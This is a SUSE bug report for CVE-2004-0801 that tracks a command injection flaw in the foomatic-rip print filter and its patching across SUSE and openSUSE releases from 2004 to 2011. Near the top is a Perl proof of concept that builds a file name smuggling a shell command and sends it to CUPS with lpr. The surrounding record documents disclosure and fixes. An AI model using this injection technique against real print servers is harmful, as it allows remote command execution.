Bug 59233 (CVE-2004-0801)

<!-- SBZ_reproduce  -->
On the CUPS server, execute:

#!/usr/bin/perl

# CUPS PoC remote exploit, requires printing access.
# Bug is in foomatic-rip perl script. it opens PPD-files
# without < so if theres a | at the end, it interprets them
# as command. Furthermore, the arguments for the script are 
# merged into one string and afterwards regex'e out. This allows
# for faking arguments via filenames.

my $ip = "127.0.0.1";
my $ppd_file =  "\x01-p\x01|\$(find)|\x01x";
open O, ">$ppd_file" or die $!;
print O "Foo!\n";
close O;

exec("lpr", "./$ppd_file");

And see whether a "find" command is started by cups server afterwards.
tested on a SL 8.2, but the current foomatic-rip script seems to be the same
and still contains the bugs.

Patches made and new packages submitted. 
Please note that this affects package cups (<= SL9.0) and later 
foomatic-filters (SL9.1, SL9.2) 
 
Security-team, please handle the rest of the update process: putonftp, etc. 
 
affected are all SUSE Linux versions. 

CAN-2004-0801

Created attachment 22980 [details]
the fix which came via vendor-sec

...

CRD around sept. 7 2004. 

fromn vendor-sec CRD summary: 
 
CAN-2004-0801       foomatic            Sep 14 ????UTC(*3)                       
CAN-2004-0558       CUPS(*1)            Sep 06 ????UTC                           
 
*1: this cups issue seems to be a mess, from what I've seen, upstream is         
going to release information for this issue on Sept 1, then 1.1.21 should        
come out on Sept 7, some on the list seem to think we're releasing on Sept       
06.  The foomatic issue will probably dictate this since it's a bit higher       
priority.                                                                        
 
*3: These are suggested release dates, if these are problems for anyone, you     
should probably speak up.                                                        

working on again on a solution, which covers the vendor-sec patches. 
have to adapt the patches to the old versions of foomatic-rip and its 
predecessor cupsomatic. 
wait with tests till I'm ready, please. 

finished with the patches (again :-) 
security-team please procede in the usual way. 
 
Patch-Management: 
Please check if printing with non PostScript printers in older SuSE Linux 
versions is still possible. Didn't have time to install and test these 
versions and the patches differ! TIA 

Created attachment 23054 [details]
patchinfo 8.1,8.2

Created attachment 23055 [details]
patchinfo 9.0, 9.1

Created attachment 23056 [details]
patchinfo sles8

Created attachment 23057 [details]
patchinfo sles9

advisories and packages are out

The foomatic fix was reverted and is not in the current packages!
Affected: 9.3, 10.0 and 10.1
Not Affected: SLES9, 9.2

So those are still exploitable by this problem.

critical.

fixed packages submitted for: 9.3, 10.0, 10.1 and STABLE
security-team handle please rest of process: swamp-id, patchinfo, etc. TIA

swamp: 4432

approved the update. thanks!

CVE-2004-0801: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

The SWAMPID for this issue is 42548.
This issue was rated as moderate.
Please submit fixed packages until 2011-08-22.
When done, please reassign the bug to security-team@suse.de.
Patchinfo will be handled by security team.

FYI regarding SLE11-SP2:
Submitted HPLIP 3.11.5 to SUSE:SLE-11-SP2:GA
via submitrequest 14060:
Version upgrade to HPLIP 3.11.5 (Fate #312667)
plus fixed CVE-2011-2697 (Bug #698451) plus
fixed leftover in CVE-2004-0801 (Bug #59233).

Submitted hplip to SUSE:SLE-11-SP1:Update:Test
via submitrequest 14078:
Fixed CVE-2011-2697 (bnc#698451) plus
fixed leftover in CVE-2004-0801 (bnc#59233)

From my point of view the issue is now fixed
in all maintained SLE products.

Submitted hplip to openSUSE:11.3:Update:Test
via submitrequest 78534:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)

Submitted hplip to openSUSE:11.4:Update:Test
via submitrequest 78539:
  Fixed CVE-2011-2697 (bnc#698451) plus
  fixed leftover in CVE-2004-0801 (bnc#59233)

From my point of view the issue is now fixed
in all maintained products.

Reopening and reassign to security-team@suse.de
according to comment #21.

FYI regarding openSUSE:Factory:

Fixed via version upgrade to current HPLIP 3.11.7
and changes to avoid the security issues.

Submitted HPLIP 3.11.7 to the
OBS Printing project via submitrequest 78629 and to
openSUSE:Factory via submitrequest 78646:
  Version upgrade to HPLIP 3.11.7 and
  avoid CVE-2011-2697 (bnc#698451)
  plus CVE-2004-0801 (bnc#59233)
  by no longer installing foomatic-rip-hplip and
  using foomatic-rip from the foomatic-filters RPM instead

From my point of view the issue is now completely
fixed in all products.

Thanks.

Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs, hplip-hpijs-debuginfo
Products:
openSUSE 11.3 (debug, i586, x86_64)
openSUSE 11.4 (debug, i586, x86_64)

Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs
Products:
SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-DESKTOP 11-SP1 (i386, x86_64)
SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64)
SLE-SERVER 11-SP1-TERADATA (x86_64)
SLES4VMWARE 11-SP1 (i386, x86_64)

seems we can close it

This is an autogenerated message for OBS integration:
This bug (59233) was mentioned in
https://build.opensuse.org/request/show/78534 11.3:Test / hplip
https://build.opensuse.org/request/show/78539 11.4:Test / hplip
https://build.opensuse.org/request/show/78646 Factory / hplip